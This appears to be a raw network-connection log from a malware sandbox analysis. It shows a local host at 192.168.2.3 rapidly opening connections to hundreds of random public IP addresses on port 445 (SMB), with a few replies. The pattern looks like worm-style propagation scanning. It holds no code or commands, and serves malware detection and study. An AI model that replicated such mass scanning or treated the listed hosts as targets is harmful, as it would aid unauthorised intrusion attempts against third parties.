                                                                                            Dec 22, 2022 10:06:05.673259020 CET52315445192.168.2.3209.134.107.91
                                                                                            Dec 22, 2022 10:06:05.673798084 CET52316445192.168.2.396.55.39.193
                                                                                            Dec 22, 2022 10:06:05.674428940 CET52317445192.168.2.359.145.78.13
                                                                                            Dec 22, 2022 10:06:05.675739050 CET52318445192.168.2.375.75.159.146
                                                                                            Dec 22, 2022 10:06:05.676517963 CET52319445192.168.2.38.25.223.91
                                                                                            Dec 22, 2022 10:06:05.676681995 CET52321445192.168.2.3137.208.157.116
                                                                                            Dec 22, 2022 10:06:05.676688910 CET52322445192.168.2.393.108.250.73
                                                                                            Dec 22, 2022 10:06:05.676707983 CET52320445192.168.2.3157.122.217.207
                                                                                            Dec 22, 2022 10:06:05.696326017 CET4455226961.38.132.59192.168.2.3
                                                                                            Dec 22, 2022 10:06:05.780788898 CET52275445192.168.2.3155.100.73.2
                                                                                            Dec 22, 2022 10:06:06.202892065 CET52275445192.168.2.3155.100.73.2
                                                                                            Dec 22, 2022 10:06:06.715524912 CET52333445192.168.2.312.225.178.42
                                                                                            Dec 22, 2022 10:06:06.715895891 CET52334445192.168.2.3130.108.41.195
                                                                                            Dec 22, 2022 10:06:06.715992928 CET52335445192.168.2.315.126.118.19
                                                                                            Dec 22, 2022 10:06:06.716032028 CET52336445192.168.2.379.157.9.93
                                                                                            Dec 22, 2022 10:06:06.716151953 CET52337445192.168.2.366.127.13.169
                                                                                            Dec 22, 2022 10:06:06.716198921 CET52338445192.168.2.370.246.120.130
                                                                                            Dec 22, 2022 10:06:06.716272116 CET52339445192.168.2.319.38.79.217
                                                                                            Dec 22, 2022 10:06:06.716454029 CET52342445192.168.2.333.232.49.104
                                                                                            Dec 22, 2022 10:06:06.716517925 CET52343445192.168.2.393.126.98.86
                                                                                            Dec 22, 2022 10:06:06.716717005 CET52346445192.168.2.3135.235.246.51
                                                                                            Dec 22, 2022 10:06:06.716815948 CET52348445192.168.2.349.199.191.155
                                                                                            Dec 22, 2022 10:06:06.717041016 CET52351445192.168.2.392.137.147.65
                                                                                            Dec 22, 2022 10:06:06.717250109 CET52352445192.168.2.34.107.84.166
                                                                                            Dec 22, 2022 10:06:06.717293024 CET52354445192.168.2.32.150.87.213
                                                                                            Dec 22, 2022 10:06:06.717413902 CET52355445192.168.2.3133.134.246.236
                                                                                            Dec 22, 2022 10:06:06.717473984 CET52356445192.168.2.384.159.235.121
                                                                                            Dec 22, 2022 10:06:06.717524052 CET52357445192.168.2.3193.36.221.252
                                                                                            Dec 22, 2022 10:06:06.717639923 CET52359445192.168.2.3192.67.150.108
                                                                                            Dec 22, 2022 10:06:06.717753887 CET52358445192.168.2.34.110.121.104
                                                                                            Dec 22, 2022 10:06:06.717753887 CET52360445192.168.2.3119.151.126.164
                                                                                            Dec 22, 2022 10:06:06.812942028 CET52362445192.168.2.3161.244.10.154
                                                                                            Dec 22, 2022 10:06:06.813340902 CET52365445192.168.2.3184.240.164.224
                                                                                            Dec 22, 2022 10:06:06.813539028 CET52366445192.168.2.333.187.254.208
                                                                                            Dec 22, 2022 10:06:06.814181089 CET52367445192.168.2.399.151.180.130
                                                                                            Dec 22, 2022 10:06:06.814788103 CET52368445192.168.2.38.159.246.246
                                                                                            Dec 22, 2022 10:06:06.815448046 CET52369445192.168.2.370.85.122.240
                                                                                            Dec 22, 2022 10:06:06.829065084 CET52370445192.168.2.380.49.249.72
                                                                                            Dec 22, 2022 10:06:06.829775095 CET52371445192.168.2.317.67.242.59
                                                                                            Dec 22, 2022 10:06:06.830795050 CET52373445192.168.2.3179.210.133.8
                                                                                            Dec 22, 2022 10:06:06.830847025 CET52372445192.168.2.342.152.221.137
                                                                                            Dec 22, 2022 10:06:07.093415022 CET52275445192.168.2.3155.100.73.2
                                                                                            Dec 22, 2022 10:06:07.814794064 CET52380445192.168.2.3130.224.7.184
                                                                                            Dec 22, 2022 10:06:07.815032005 CET52381445192.168.2.3152.213.74.166
                                                                                            Dec 22, 2022 10:06:07.815203905 CET52382445192.168.2.3132.190.154.188
                                                                                            Dec 22, 2022 10:06:07.815403938 CET52383445192.168.2.3208.61.30.19
                                                                                            Dec 22, 2022 10:06:07.815491915 CET52384445192.168.2.3202.186.89.114
                                                                                            Dec 22, 2022 10:06:07.815606117 CET52385445192.168.2.3101.56.199.133
                                                                                            Dec 22, 2022 10:06:07.815685987 CET52386445192.168.2.3114.52.141.139
                                                                                            Dec 22, 2022 10:06:07.815769911 CET52387445192.168.2.3106.35.200.37
                                                                                            Dec 22, 2022 10:06:07.815949917 CET52389445192.168.2.3192.22.234.248
                                                                                            Dec 22, 2022 10:06:07.816303015 CET52392445192.168.2.3186.130.183.237
                                                                                            Dec 22, 2022 10:06:07.816330910 CET52393445192.168.2.327.209.80.211
                                                                                            Dec 22, 2022 10:06:07.816530943 CET52396445192.168.2.3205.176.120.164
                                                                                            Dec 22, 2022 10:06:07.816720963 CET52398445192.168.2.3202.184.203.64
                                                                                            Dec 22, 2022 10:06:07.816840887 CET52401445192.168.2.3105.56.82.45
                                                                                            Dec 22, 2022 10:06:07.816927910 CET52403445192.168.2.38.37.167.206
                                                                                            Dec 22, 2022 10:06:07.817028999 CET52404445192.168.2.3221.32.158.195
                                                                                            Dec 22, 2022 10:06:07.817028999 CET52402445192.168.2.3180.110.167.140
                                                                                            Dec 22, 2022 10:06:07.817070961 CET52405445192.168.2.3154.68.254.130
                                                                                            Dec 22, 2022 10:06:07.817125082 CET52406445192.168.2.365.168.186.31
                                                                                            Dec 22, 2022 10:06:07.817178011 CET52407445192.168.2.3124.7.141.56
                                                                                            Dec 22, 2022 10:06:07.927419901 CET52413445192.168.2.353.149.70.26
                                                                                            Dec 22, 2022 10:06:07.928221941 CET52414445192.168.2.386.25.102.214
                                                                                            Dec 22, 2022 10:06:07.928905010 CET52415445192.168.2.3112.242.187.29
                                                                                            Dec 22, 2022 10:06:07.929092884 CET52416445192.168.2.3155.220.205.216
                                                                                            Dec 22, 2022 10:06:07.929277897 CET52417445192.168.2.3223.208.162.100
                                                                                            Dec 22, 2022 10:06:07.929620028 CET52420445192.168.2.3203.238.253.31
                                                                                            Dec 22, 2022 10:06:07.938060999 CET52422445192.168.2.3161.12.98.159
                                                                                            Dec 22, 2022 10:06:07.938967943 CET52423445192.168.2.328.203.165.192
                                                                                            Dec 22, 2022 10:06:07.939557076 CET52424445192.168.2.342.222.97.20
                                                                                            Dec 22, 2022 10:06:07.940099001 CET52425445192.168.2.3149.35.182.125
                                                                                            Dec 22, 2022 10:06:08.859227896 CET52275445192.168.2.3155.100.73.2
                                                                                            Dec 22, 2022 10:06:08.940354109 CET52437445192.168.2.3113.230.217.106
                                                                                            Dec 22, 2022 10:06:08.940356970 CET52436445192.168.2.3133.142.187.34
                                                                                            Dec 22, 2022 10:06:08.940506935 CET52438445192.168.2.3217.93.127.169
                                                                                            Dec 22, 2022 10:06:08.940612078 CET52439445192.168.2.3182.160.95.200
                                                                                            Dec 22, 2022 10:06:08.940701008 CET52440445192.168.2.3100.171.12.97
                                                                                            Dec 22, 2022 10:06:08.940921068 CET52442445192.168.2.3222.95.156.61
                                                                                            Dec 22, 2022 10:06:08.941127062 CET52445445192.168.2.3135.206.47.214
                                                                                            Dec 22, 2022 10:06:08.941302061 CET52447445192.168.2.3153.83.15.86
                                                                                            Dec 22, 2022 10:06:08.941596985 CET52451445192.168.2.3130.14.4.43
                                                                                            Dec 22, 2022 10:06:08.942020893 CET52454445192.168.2.355.128.172.251
                                                                                            Dec 22, 2022 10:06:08.942178965 CET52456445192.168.2.3132.194.158.184
                                                                                            Dec 22, 2022 10:06:08.942270041 CET52457445192.168.2.3155.171.69.3
                                                                                            Dec 22, 2022 10:06:08.942346096 CET52458445192.168.2.3197.89.199.156
                                                                                            Dec 22, 2022 10:06:08.942449093 CET52459445192.168.2.3223.184.61.164
                                                                                            Dec 22, 2022 10:06:08.942538977 CET52460445192.168.2.3130.27.139.131
                                                                                            Dec 22, 2022 10:06:08.942620993 CET52461445192.168.2.3100.156.35.117
                                                                                            Dec 22, 2022 10:06:08.942748070 CET52462445192.168.2.3170.232.153.10
                                                                                            Dec 22, 2022 10:06:08.942800045 CET52463445192.168.2.377.95.106.209
                                                                                            Dec 22, 2022 10:06:09.048317909 CET52465445192.168.2.3132.71.165.144
                                                                                            Dec 22, 2022 10:06:09.049130917 CET52466445192.168.2.329.0.160.252
                                                                                            Dec 22, 2022 10:06:09.049930096 CET52467445192.168.2.394.98.173.251
                                                                                            Dec 22, 2022 10:06:09.050244093 CET52468445192.168.2.3215.198.91.52
                                                                                            Dec 22, 2022 10:06:09.050302029 CET52469445192.168.2.3171.240.135.214
                                                                                            Dec 22, 2022 10:06:09.050460100 CET52472445192.168.2.365.147.193.77
                                                                                            Dec 22, 2022 10:06:09.063775063 CET52474445192.168.2.385.100.180.129
                                                                                            Dec 22, 2022 10:06:09.064346075 CET52475445192.168.2.3161.125.122.90
                                                                                            Dec 22, 2022 10:06:09.064383030 CET52476445192.168.2.384.166.170.244
                                                                                            Dec 22, 2022 10:06:09.064429998 CET52477445192.168.2.375.172.194.14
                                                                                            Dec 22, 2022 10:06:09.599684954 CET52482445192.168.2.345.117.145.2
                                                                                            Dec 22, 2022 10:06:09.910907030 CET4455248245.117.145.2192.168.2.3
                                                                                            Dec 22, 2022 10:06:09.911163092 CET52482445192.168.2.345.117.145.2
                                                                                            Dec 22, 2022 10:06:09.911252022 CET52482445192.168.2.345.117.145.2
                                                                                            Dec 22, 2022 10:06:09.912065029 CET52485445192.168.2.345.117.145.2
                                                                                            Dec 22, 2022 10:06:10.047622919 CET52489445192.168.2.3158.252.139.5
                                                                                            Dec 22, 2022 10:06:10.047755957 CET52491445192.168.2.3188.133.112.131
                                                                                            Dec 22, 2022 10:06:10.047847033 CET52493445192.168.2.3132.73.160.155
                                                                                            Dec 22, 2022 10:06:10.047924042 CET52495445192.168.2.3187.194.100.76
                                                                                            Dec 22, 2022 10:06:10.048054934 CET52498445192.168.2.355.31.201.243
                                                                                            Dec 22, 2022 10:06:10.048202991 CET52500445192.168.2.3178.196.55.68
                                                                                            Dec 22, 2022 10:06:10.048230886 CET52501445192.168.2.3201.67.6.103
                                                                                            Dec 22, 2022 10:06:10.048336029 CET52502445192.168.2.335.18.69.96
                                                                                            Dec 22, 2022 10:06:10.048414946 CET52504445192.168.2.3188.150.85.234
                                                                                            Dec 22, 2022 10:06:10.048439980 CET52505445192.168.2.371.102.66.23
                                                                                            Dec 22, 2022 10:06:10.048440933 CET52503445192.168.2.3115.167.22.253
                                                                                            Dec 22, 2022 10:06:10.048506975 CET52506445192.168.2.3137.94.25.26
                                                                                            Dec 22, 2022 10:06:10.048618078 CET52507445192.168.2.382.206.133.67
                                                                                            Dec 22, 2022 10:06:10.048654079 CET52509445192.168.2.3179.119.98.14
                                                                                            Dec 22, 2022 10:06:10.048700094 CET52510445192.168.2.3100.4.63.213
                                                                                            Dec 22, 2022 10:06:10.048872948 CET52514445192.168.2.3221.220.78.251
                                                                                            Dec 22, 2022 10:06:10.048872948 CET52515445192.168.2.3204.219.78.117
                                                                                            Dec 22, 2022 10:06:10.048980951 CET52517445192.168.2.3219.36.153.0
                                                                                            Dec 22, 2022 10:06:10.049071074 CET52518445192.168.2.3142.81.11.135
                                                                                            Dec 22, 2022 10:06:10.049082994 CET52516445192.168.2.3128.171.237.227
                                                                                            Dec 22, 2022 10:06:10.157597065 CET52520445192.168.2.39.88.137.215
                                                                                            Dec 22, 2022 10:06:10.158231974 CET52521445192.168.2.3116.8.91.7
                                                                                            Dec 22, 2022 10:06:10.158956051 CET52522445192.168.2.3136.117.245.47
                                                                                            Dec 22, 2022 10:06:10.159198999 CET52523445192.168.2.3192.209.80.153
                                                                                            Dec 22, 2022 10:06:10.159328938 CET52524445192.168.2.341.12.225.174
                                                                                            Dec 22, 2022 10:06:10.159656048 CET52527445192.168.2.3110.10.150.49
                                                                                            Dec 22, 2022 10:06:10.172976971 CET52529445192.168.2.3131.90.200.201
                                                                                            Dec 22, 2022 10:06:10.173450947 CET52530445192.168.2.3108.126.198.132
                                                                                            Dec 22, 2022 10:06:10.173949003 CET52531445192.168.2.3186.220.238.29
                                                                                            Dec 22, 2022 10:06:10.174415112 CET52532445192.168.2.3121.149.164.107
                                                                                            Dec 22, 2022 10:06:10.213572979 CET4455248545.117.145.2192.168.2.3
                                                                                            Dec 22, 2022 10:06:10.213736057 CET52485445192.168.2.345.117.145.2
                                                                                            Dec 22, 2022 10:06:10.221751928 CET52485445192.168.2.345.117.145.2
                                                                                            Dec 22, 2022 10:06:10.874984980 CET52485445192.168.2.345.117.145.2
                                                                                            Dec 22, 2022 10:06:10.874989986 CET52482445192.168.2.345.117.145.2
                                                                                            Dec 22, 2022 10:06:11.172305107 CET52542445192.168.2.3155.208.65.218
                                                                                            Dec 22, 2022 10:06:11.172456026 CET52544445192.168.2.3125.171.195.181
                                                                                            Dec 22, 2022 10:06:11.172601938 CET52547445192.168.2.385.135.149.84
                                                                                            Dec 22, 2022 10:06:11.172733068 CET52549445192.168.2.3195.249.112.143
                                                                                            Dec 22, 2022 10:06:11.172758102 CET52550445192.168.2.3190.83.48.154
                                                                                            Dec 22, 2022 10:06:11.172960043 CET52553445192.168.2.3152.181.105.112
                                                                                            Dec 22, 2022 10:06:11.172965050 CET52554445192.168.2.394.20.110.229
                                                                                            Dec 22, 2022 10:06:11.173079014 CET52555445192.168.2.346.65.38.178
                                                                                            Dec 22, 2022 10:06:11.173181057 CET52556445192.168.2.3150.96.162.5
                                                                                            Dec 22, 2022 10:06:11.173223019 CET52558445192.168.2.3200.116.85.204
                                                                                            Dec 22, 2022 10:06:11.173275948 CET52559445192.168.2.3192.107.51.187
                                                                                            Dec 22, 2022 10:06:11.173291922 CET52557445192.168.2.383.125.61.228
                                                                                            Dec 22, 2022 10:06:11.173383951 CET52561445192.168.2.3195.234.221.26
                                                                                            Dec 22, 2022 10:06:11.173441887 CET52562445192.168.2.3193.133.113.139
                                                                                            Dec 22, 2022 10:06:11.173491001 CET52563445192.168.2.3125.60.252.159
                                                                                            Dec 22, 2022 10:06:11.173702955 CET52567445192.168.2.38.156.80.17
                                                                                            Dec 22, 2022 10:06:11.173754930 CET52568445192.168.2.3173.97.24.73
                                                                                            Dec 22, 2022 10:06:11.173820972 CET52569445192.168.2.353.174.120.233
                                                                                            Dec 22, 2022 10:06:11.173856974 CET52570445192.168.2.316.59.178.49
                                                                                            Dec 22, 2022 10:06:11.173927069 CET52571445192.168.2.3113.238.124.243
                                                                                            Dec 22, 2022 10:06:11.266825914 CET52572445192.168.2.323.42.16.72
                                                                                            Dec 22, 2022 10:06:11.267059088 CET52573445192.168.2.3179.148.182.53
                                                                                            Dec 22, 2022 10:06:11.267133951 CET52574445192.168.2.359.6.48.247
                                                                                            Dec 22, 2022 10:06:11.267277956 CET52576445192.168.2.350.181.96.46
                                                                                            Dec 22, 2022 10:06:11.267973900 CET52580445192.168.2.3159.245.180.213
                                                                                            Dec 22, 2022 10:06:11.268119097 CET52581445192.168.2.3164.114.23.230
                                                                                            Dec 22, 2022 10:06:11.298269033 CET52582445192.168.2.35.45.138.138
                                                                                            Dec 22, 2022 10:06:11.298918009 CET52583445192.168.2.3194.98.3.76
                                                                                            Dec 22, 2022 10:06:11.299396038 CET52584445192.168.2.3164.101.95.24
                                                                                            Dec 22, 2022 10:06:11.300422907 CET52585445192.168.2.3217.226.138.178
                                                                                            Dec 22, 2022 10:06:11.828273058 CET52485445192.168.2.345.117.145.2
                                                                                            Dec 22, 2022 10:06:12.282845020 CET52594445192.168.2.3200.207.149.131
                                                                                            Dec 22, 2022 10:06:12.282849073 CET52595445192.168.2.337.111.210.245
                                                                                            Dec 22, 2022 10:06:12.283024073 CET52596445192.168.2.394.213.68.33
                                                                                            Dec 22, 2022 10:06:12.283308983 CET52597445192.168.2.3126.33.154.123
                                                                                            Dec 22, 2022 10:06:12.283478022 CET52598445192.168.2.3191.121.20.212
                                                                                            Dec 22, 2022 10:06:12.283962011 CET52602445192.168.2.359.149.215.48
                                                                                            Dec 22, 2022 10:06:12.284109116 CET52603445192.168.2.3162.84.105.84
                                                                                            Dec 22, 2022 10:06:12.284251928 CET52604445192.168.2.3196.144.169.137
                                                                                            Dec 22, 2022 10:06:12.284562111 CET52606445192.168.2.3220.208.219.96
                                                                                            Dec 22, 2022 10:06:12.284802914 CET52607445192.168.2.376.30.105.113
                                                                                            Dec 22, 2022 10:06:12.284914017 CET52608445192.168.2.3154.118.165.243
                                                                                            Dec 22, 2022 10:06:12.285043955 CET52609445192.168.2.3211.187.222.74
                                                                                            Dec 22, 2022 10:06:12.285280943 CET52610445192.168.2.373.128.33.86
                                                                                            Dec 22, 2022 10:06:12.285429955 CET52611445192.168.2.389.87.194.207
                                                                                            Dec 22, 2022 10:06:12.285557032 CET52612445192.168.2.352.171.47.3
                                                                                            Dec 22, 2022 10:06:12.285892010 CET52615445192.168.2.312.213.87.139
                                                                                            Dec 22, 2022 10:06:12.286009073 CET52616445192.168.2.3217.41.194.89
                                                                                            Dec 22, 2022 10:06:12.286252975 CET52618445192.168.2.3152.70.35.165
                                                                                            Dec 22, 2022 10:06:12.286788940 CET52621445192.168.2.35.142.161.13
                                                                                            Dec 22, 2022 10:06:12.286998034 CET52622445192.168.2.366.232.21.197
                                                                                            Dec 22, 2022 10:06:12.375269890 CET52275445192.168.2.3155.100.73.2
                                                                                            Dec 22, 2022 10:06:12.376163006 CET52626445192.168.2.376.28.243.113
                                                                                            Dec 22, 2022 10:06:12.376291990 CET52627445192.168.2.3160.58.98.186
                                                                                            Dec 22, 2022 10:06:12.376585007 CET52630445192.168.2.3137.90.139.79
                                                                                            Dec 22, 2022 10:06:12.377274036 CET52633445192.168.2.337.160.67.66
                                                                                            Dec 22, 2022 10:06:12.377717018 CET52634445192.168.2.3153.38.233.53
                                                                                            Dec 22, 2022 10:06:12.378215075 CET52635445192.168.2.3181.95.130.101
                                                                                            Dec 22, 2022 10:06:12.430474043 CET52636445192.168.2.3220.70.137.48
                                                                                            Dec 22, 2022 10:06:12.431030989 CET52637445192.168.2.337.194.105.97
                                                                                            Dec 22, 2022 10:06:12.460303068 CET52638445192.168.2.333.118.239.150
                                                                                            Dec 22, 2022 10:06:12.464855909 CET52639445192.168.2.389.17.155.88
                                                                                            Dec 22, 2022 10:06:12.718914032 CET52482445192.168.2.345.117.145.2
                                                                                            Dec 22, 2022 10:06:13.408066034 CET52648445192.168.2.3154.227.31.76
                                                                                            Dec 22, 2022 10:06:13.408112049 CET52649445192.168.2.3199.202.66.254
                                                                                            Dec 22, 2022 10:06:13.408318043 CET52650445192.168.2.379.192.2.70
                                                                                            Dec 22, 2022 10:06:13.408318043 CET52651445192.168.2.3157.231.205.130
                                                                                            Dec 22, 2022 10:06:13.408425093 CET52652445192.168.2.3122.16.211.74
                                                                                            Dec 22, 2022 10:06:13.408710957 CET52656445192.168.2.3189.236.88.110
                                                                                            Dec 22, 2022 10:06:13.408804893 CET52657445192.168.2.367.121.221.93
                                                                                            Dec 22, 2022 10:06:13.408947945 CET52658445192.168.2.332.120.124.245
                                                                                            Dec 22, 2022 10:06:13.409141064 CET52660445192.168.2.372.33.18.64
                                                                                            Dec 22, 2022 10:06:13.409311056 CET52661445192.168.2.332.23.197.62
                                                                                            Dec 22, 2022 10:06:13.409411907 CET52662445192.168.2.368.232.138.169
                                                                                            Dec 22, 2022 10:06:13.409504890 CET52663445192.168.2.3198.127.219.72
                                                                                            Dec 22, 2022 10:06:13.409590006 CET52664445192.168.2.3135.88.6.38
                                                                                            Dec 22, 2022 10:06:13.409693956 CET52665445192.168.2.3191.186.224.122
                                                                                            Dec 22, 2022 10:06:13.409778118 CET52666445192.168.2.344.103.224.175
                                                                                            Dec 22, 2022 10:06:13.410192013 CET52669445192.168.2.3149.207.62.237
                                                                                            Dec 22, 2022 10:06:13.410233974 CET52670445192.168.2.379.21.85.235
                                                                                            Dec 22, 2022 10:06:13.410418987 CET52672445192.168.2.3183.44.6.65
                                                                                            Dec 22, 2022 10:06:13.410676956 CET52675445192.168.2.3216.96.168.7
                                                                                            Dec 22, 2022 10:06:13.411930084 CET52676445192.168.2.341.213.187.51
                                                                                            Dec 22, 2022 10:06:13.501275063 CET52680445192.168.2.320.86.5.203
                                                                                            Dec 22, 2022 10:06:13.501442909 CET52681445192.168.2.3128.34.51.135
                                                                                            Dec 22, 2022 10:06:13.501715899 CET52684445192.168.2.3109.206.180.79
                                                                                            Dec 22, 2022 10:06:13.502479076 CET52687445192.168.2.3180.50.227.61
                                                                                            Dec 22, 2022 10:06:13.503559113 CET52688445192.168.2.3203.176.173.239
                                                                                            Dec 22, 2022 10:06:13.504407883 CET52689445192.168.2.3180.73.149.125
                                                                                            Dec 22, 2022 10:06:13.548676968 CET52690445192.168.2.36.112.249.123
                                                                                            Dec 22, 2022 10:06:13.552258015 CET52691445192.168.2.381.236.139.182
                                                                                            Dec 22, 2022 10:06:13.579837084 CET52692445192.168.2.3180.33.147.202
                                                                                            Dec 22, 2022 10:06:13.580534935 CET52693445192.168.2.395.154.89.97
                                                                                            Dec 22, 2022 10:06:13.640825033 CET52485445192.168.2.345.117.145.2
                                                                                            Dec 22, 2022 10:06:14.532105923 CET52706445192.168.2.3171.78.60.187
                                                                                            Dec 22, 2022 10:06:14.532223940 CET52707445192.168.2.33.195.2.22
                                                                                            Dec 22, 2022 10:06:14.532356024 CET52708445192.168.2.3132.185.199.195
                                                                                            Dec 22, 2022 10:06:14.532413006 CET52709445192.168.2.3111.5.138.140
                                                                                            Dec 22, 2022 10:06:14.532540083 CET52710445192.168.2.399.220.59.216
                                                                                            Dec 22, 2022 10:06:14.532851934 CET52714445192.168.2.3146.163.197.141
                                                                                            Dec 22, 2022 10:06:14.532975912 CET52715445192.168.2.3191.82.222.81
                                                                                            Dec 22, 2022 10:06:14.533073902 CET52716445192.168.2.3179.67.124.210
                                                                                            Dec 22, 2022 10:06:14.533227921 CET52718445192.168.2.358.218.167.64
                                                                                            Dec 22, 2022 10:06:14.533302069 CET52719445192.168.2.3182.85.253.83
                                                                                            Dec 22, 2022 10:06:14.533395052 CET52720445192.168.2.36.101.181.118
                                                                                            Dec 22, 2022 10:06:14.533473969 CET52721445192.168.2.3116.13.23.184
                                                                                            Dec 22, 2022 10:06:14.533576012 CET52722445192.168.2.3168.129.249.17
                                                                                            Dec 22, 2022 10:06:14.533655882 CET52723445192.168.2.3164.116.29.164
                                                                                            Dec 22, 2022 10:06:14.533740044 CET52724445192.168.2.3143.61.174.193
                                                                                            Dec 22, 2022 10:06:14.533974886 CET52727445192.168.2.3217.202.192.181
                                                                                            Dec 22, 2022 10:06:14.534090996 CET52728445192.168.2.3170.164.130.193
                                                                                            Dec 22, 2022 10:06:14.534226894 CET52730445192.168.2.3103.225.99.97
                                                                                            Dec 22, 2022 10:06:14.534455061 CET52733445192.168.2.346.185.222.159
                                                                                            Dec 22, 2022 10:06:14.534635067 CET52734445192.168.2.3106.161.87.92
                                                                                            Dec 22, 2022 10:06:14.613032103 CET52737445192.168.2.357.182.252.59
                                                                                            Dec 22, 2022 10:06:14.613040924 CET52736445192.168.2.394.246.68.80
                                                                                            Dec 22, 2022 10:06:14.613070965 CET52735445192.168.2.3197.225.123.225
                                                                                            Dec 22, 2022 10:06:14.613177061 CET52740445192.168.2.3107.149.30.236
                                                                                            Dec 22, 2022 10:06:14.613413095 CET52743445192.168.2.3112.22.150.217
                                                                                            Dec 22, 2022 10:06:14.613614082 CET52744445192.168.2.384.166.223.72
                                                                                            Dec 22, 2022 10:06:14.672868013 CET52745445192.168.2.390.61.112.184
                                                                                            Dec 22, 2022 10:06:14.673495054 CET52746445192.168.2.349.167.202.52
                                                                                            Dec 22, 2022 10:06:14.736641884 CET52747445192.168.2.391.72.145.3
                                                                                            Dec 22, 2022 10:06:14.737127066 CET52748445192.168.2.3180.127.186.50
                                                                                            Dec 22, 2022 10:06:15.653301001 CET52758445192.168.2.339.32.182.213
                                                                                            Dec 22, 2022 10:06:15.653461933 CET52759445192.168.2.3176.150.137.28
                                                                                            Dec 22, 2022 10:06:15.653697014 CET52761445192.168.2.3177.84.199.241
                                                                                            Dec 22, 2022 10:06:15.653810024 CET52762445192.168.2.3162.32.63.37
                                                                                            Dec 22, 2022 10:06:15.653899908 CET52763445192.168.2.3212.218.166.31
                                                                                            Dec 22, 2022 10:06:15.653974056 CET52764445192.168.2.3142.211.1.188
                                                                                            Dec 22, 2022 10:06:15.654098988 CET52765445192.168.2.363.178.156.254
                                                                                            Dec 22, 2022 10:06:15.654184103 CET52766445192.168.2.354.143.189.202
                                                                                            Dec 22, 2022 10:06:15.654288054 CET52767445192.168.2.317.18.35.98
                                                                                            Dec 22, 2022 10:06:15.654654026 CET52770445192.168.2.3162.72.78.106
                                                                                            Dec 22, 2022 10:06:15.654818058 CET52771445192.168.2.337.219.46.246
                                                                                            Dec 22, 2022 10:06:15.654984951 CET52773445192.168.2.359.127.213.23
                                                                                            Dec 22, 2022 10:06:15.655219078 CET52776445192.168.2.3118.150.223.16
                                                                                            Dec 22, 2022 10:06:15.655314922 CET52777445192.168.2.3152.87.167.208
                                                                                            Dec 22, 2022 10:06:15.655930996 CET52781445192.168.2.3143.124.203.60
                                                                                            Dec 22, 2022 10:06:15.656044960 CET52782445192.168.2.3187.75.3.239
                                                                                            Dec 22, 2022 10:06:15.656125069 CET52783445192.168.2.3178.244.6.202
                                                                                            Dec 22, 2022 10:06:15.656223059 CET52784445192.168.2.393.238.3.154
                                                                                            Dec 22, 2022 10:06:15.656472921 CET52785445192.168.2.3168.184.205.162
                                                                                            Dec 22, 2022 10:06:15.657115936 CET52788445192.168.2.3184.55.110.81
                                                                                            Dec 22, 2022 10:06:15.719738007 CET52790445192.168.2.321.225.93.4
                                                                                            Dec 22, 2022 10:06:15.720000982 CET52791445192.168.2.321.138.45.114
                                                                                            Dec 22, 2022 10:06:15.720815897 CET52794445192.168.2.376.44.62.175
                                                                                            Dec 22, 2022 10:06:15.722127914 CET52797445192.168.2.3143.4.7.180
                                                                                            Dec 22, 2022 10:06:15.722815990 CET52798445192.168.2.3158.70.208.34
                                                                                            Dec 22, 2022 10:06:15.723411083 CET52799445192.168.2.333.190.58.238
                                                                                            Dec 22, 2022 10:06:15.782596111 CET52800445192.168.2.319.35.2.170
                                                                                            Dec 22, 2022 10:06:15.782836914 CET52801445192.168.2.3158.28.106.74
                                                                                            Dec 22, 2022 10:06:15.869621038 CET52802445192.168.2.330.199.99.182
                                                                                            Dec 22, 2022 10:06:15.870184898 CET52803445192.168.2.3178.34.202.161
                                                                                            Dec 22, 2022 10:06:15.917880058 CET4455277359.127.213.23192.168.2.3
                                                                                            Dec 22, 2022 10:06:16.375617981 CET52482445192.168.2.345.117.145.2
                                                                                            Dec 22, 2022 10:06:16.423623085 CET52773445192.168.2.359.127.213.23
                                                                                            Dec 22, 2022 10:06:16.687087059 CET4455277359.127.213.23192.168.2.3
                                                                                            Dec 22, 2022 10:06:16.767529011 CET52816445192.168.2.3156.11.174.171
                                                                                            Dec 22, 2022 10:06:16.767535925 CET52818445192.168.2.3146.59.189.79
                                                                                            Dec 22, 2022 10:06:16.767591000 CET52819445192.168.2.315.251.50.237
                                                                                            Dec 22, 2022 10:06:16.767659903 CET52820445192.168.2.3211.57.184.26
                                                                                            Dec 22, 2022 10:06:16.767769098 CET52821445192.168.2.353.120.198.85
                                                                                            Dec 22, 2022 10:06:16.767927885 CET52822445192.168.2.389.180.247.242
                                                                                            Dec 22, 2022 10:06:16.768100977 CET52826445192.168.2.366.61.221.250
                                                                                            Dec 22, 2022 10:06:16.768193960 CET52827445192.168.2.3187.220.130.106
                                                                                            Dec 22, 2022 10:06:16.768388033 CET52830445192.168.2.3155.207.29.12
                                                                                            Dec 22, 2022 10:06:16.768472910 CET52832445192.168.2.3219.217.33.249
                                                                                            Dec 22, 2022 10:06:16.768543959 CET52833445192.168.2.3129.70.248.113
                                                                                            Dec 22, 2022 10:06:16.768812895 CET52836445192.168.2.358.231.64.36
                                                                                            Dec 22, 2022 10:06:16.768858910 CET52837445192.168.2.3221.101.143.225
                                                                                            Dec 22, 2022 10:06:16.768996000 CET52838445192.168.2.3145.96.128.34
                                                                                            Dec 22, 2022 10:06:16.769041061 CET52839445192.168.2.319.52.224.163
                                                                                            Dec 22, 2022 10:06:16.769109011 CET52840445192.168.2.3124.122.143.73
                                                                                            Dec 22, 2022 10:06:16.769237995 CET52841445192.168.2.34.208.202.20
                                                                                            Dec 22, 2022 10:06:16.769267082 CET52842445192.168.2.345.132.88.0
                                                                                            Dec 22, 2022 10:06:16.769406080 CET52844445192.168.2.313.53.238.14
                                                                                            Dec 22, 2022 10:06:16.769459963 CET52845445192.168.2.3143.187.147.202
                                                                                            Dec 22, 2022 10:06:16.832619905 CET4455282289.180.247.242192.168.2.3
                                                                                            Dec 22, 2022 10:06:16.832794905 CET52822445192.168.2.389.180.247.242
                                                                                            Dec 22, 2022 10:06:16.839937925 CET52822445192.168.2.389.180.247.242
                                                                                            Dec 22, 2022 10:06:16.840198994 CET52846445192.168.2.389.180.247.1
                                                                                            Dec 22, 2022 10:06:16.845210075 CET52847445192.168.2.3125.194.246.155
                                                                                            Dec 22, 2022 10:06:16.845455885 CET52848445192.168.2.340.28.74.186
                                                                                            Dec 22, 2022 10:06:16.845491886 CET52849445192.168.2.3103.3.237.131
                                                                                            Dec 22, 2022 10:06:16.846282005 CET52854445192.168.2.3187.129.71.20
                                                                                            Dec 22, 2022 10:06:16.846815109 CET52855445192.168.2.3172.220.221.24
                                                                                            Dec 22, 2022 10:06:16.847373009 CET52856445192.168.2.356.140.154.135
